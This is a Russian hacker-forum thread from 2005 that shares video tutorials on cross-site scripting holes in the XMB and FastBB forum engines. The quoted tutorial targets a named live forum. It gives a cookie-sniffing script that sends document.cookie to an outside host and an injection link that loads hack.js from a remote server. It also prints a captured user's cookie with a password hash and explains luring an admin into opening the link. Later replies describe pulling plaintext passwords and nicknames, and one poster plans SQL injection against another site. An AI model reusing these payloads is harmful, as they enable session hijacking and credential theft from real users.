Форум АНТИЧАТ - XSS в форумах XMB и FastBB

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Комментарии к видео (https://forum.antichat.xyz/forumdisplay.php?f=27)

- - XSS в форумах XMB и FastBB (https://forum.antichat.xyz/showthread.php?t=10823)

XSS в форумах XMB и FastBB

http://video.antichat.net/screens/Xg...xss_resize.jpg

XSS в форумах XMB.
Дата добавления: 15:54 16.11.2005
Автор: XgluiR[[NO]]
Категория: Другое

Скачать: xmbxss.rar [0.99 Мб]

http://video.antichat.net/screens/va...xss_resize.jpg

XSS в форумах FastBB.
Дата добавления: 15:51 16.11.2005
Автор: Ван[[NO]]
Категория: Другое

Скачать: fastbbxss.rar [0.56 Мб]

Выдрано из архива с видео

Цитата:

Привет я XgLuir

Сейчас я покажу XSS в форумах XMB

идем на форум а потом в отправку личных сообщений

http://www.karakelle.ru/forum/u2u.php?action=send - тут форма для отпраки!

Дыра находиться в форме для получателей из-за плохой фильтрации

Как видите пашет внедрим снифир :)

Для этого создадим js файл с кодом для сниффера

img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

он у меня уже есть :)

http://www.fath.jino-net.ru/hack.js

Внедрим

REFERER=http://www.karakelle.ru/forum/u2u.php?action=send&username=<script>alert('xss')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script>
QUERY=xmblva=1131740719; xmbuser=Зайка; xmbpw=202cb962ac59075b964b07152d234b70; xmblvb=1131737548
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Ну вот получили
xmbpw=202cb962ac59075b964b07152d234b70 - md5 hash

Но наверно появился вапрос а как у админы стырить ?

Отправляем админу сформированый линк он открывает и снифф записывает кукисы

http://www.karakelle.ru/forum/u2u.php?action=send&username=<script%20src=http://www.fath.jino-net.ru/hack.js></script>

Но лучше ссылку за кодировать :)

Вот и все

мда, извращение записывать видео, когда это мона описать в жва предложения.
Otaku спасибо.

На fastbb багу уже прикрыли.

Цитата:

На fastbb багу уже прикрыли.

Баг сам нашел?? вроде wj че-та находил да?

Цитата:

Сообщение от qBiN

Баг сам нашел?? вроде wj че-та находил да?

Задолго до wj енти и другие баги нашёл Zadohlik. Просто человек скромный и не страдает манией величия. А ентот wj взял и всё обосрал - даже упаковать не смог красиво.

Да, я взял багу которую выложил на форум wj, но она не работала-куки не подставлялись я просто капельку додумал-присылать переменные, во всем мне многие помогали, всем респект. Видео я сначала снимать и не думал, но потом подкинули идею-решил снять.
Насчёт сейчашней ситуации на fastbb-сейчас там что-то меняют, тег img не работает вообще. Обещают(посмотрел на a.fastbb.ru) что скоро закончат.

Цитата:

Сообщение от PSalm69

Интересно, как понять эти и другие баги нашёл Задохлик? Что, все баги которые Я нашёл, Задохлик нашёл первый? или тебя понимать, что чтобы Я не находил, Задохлик уже это нашёл? Если да, то что? Это раз, два, Задохлик не показывает мне свою работу, по этому надежды что то скопировать у меня у него - нету как таковой.

Теперь, люди на форуме просили взломать фастбб потому что никто его не мог взломать. Если Задохлик, а кажись первым был не Задохлик а Джаз, ну так вот, если Джаз не захотел выложить коды для фастбб, или тот который нашёл, то это уже их проблемы. Я их выложил чисто чтобы похвастатся что Я Гений.

А вообще, Задохлик мало что понимает в ХSS, найти багу, с трудом может. Единственные люди на античате которые шарют в ХSS, так это White Jordan, Algol, zheleza, и zFailure которого терь нет. Задохлика эрия, это PHP including, так что не верю, что он мог в фастбб найти спаренные теги.

И на ответ, что же встётки нашёл Ван.

Он нашёл, что в поле var, пассворд не шифруется, а лежит в открытом виде и дописав "+pass+nick" в место "+document.cookie" (Без кавычек) то нам придёт значение этого атрибута, то есть в нашем случаи, пассворд и ник того человека, который попадается на сниффер. Вообще-то, на сниффер может прийти практически, всё что угодно.

Даю часть кода от фастбб.

Цитата:

Любой var может прийти на сниффер.

Сейчас бесполезно перемалывать старое. Уязвимость fastbb нужна так, что важней уязвимостей на форумах в этой стране просто нет. Есть 4 форума которых быть не должно. Сейчас на fastbb фильтруются все таги, расшифровывается unicode. Несмотря на идиотичнейший движок вот так, в лоб, найти XSS более невозможно. Фильтр работает на все символы, а возможностей у форума.. Новый XSS на fastbb появится только с новыми возможностями (новыми багами). Молчание знающих товарищей в ответ на запросы подтверждает эти тезисы. Вероятно имеет смысл переходить на SQL-инъекции borda.ru. За те четыре форума я готов убить borda.ru, в принципе. Но мне нужны только эти четыре..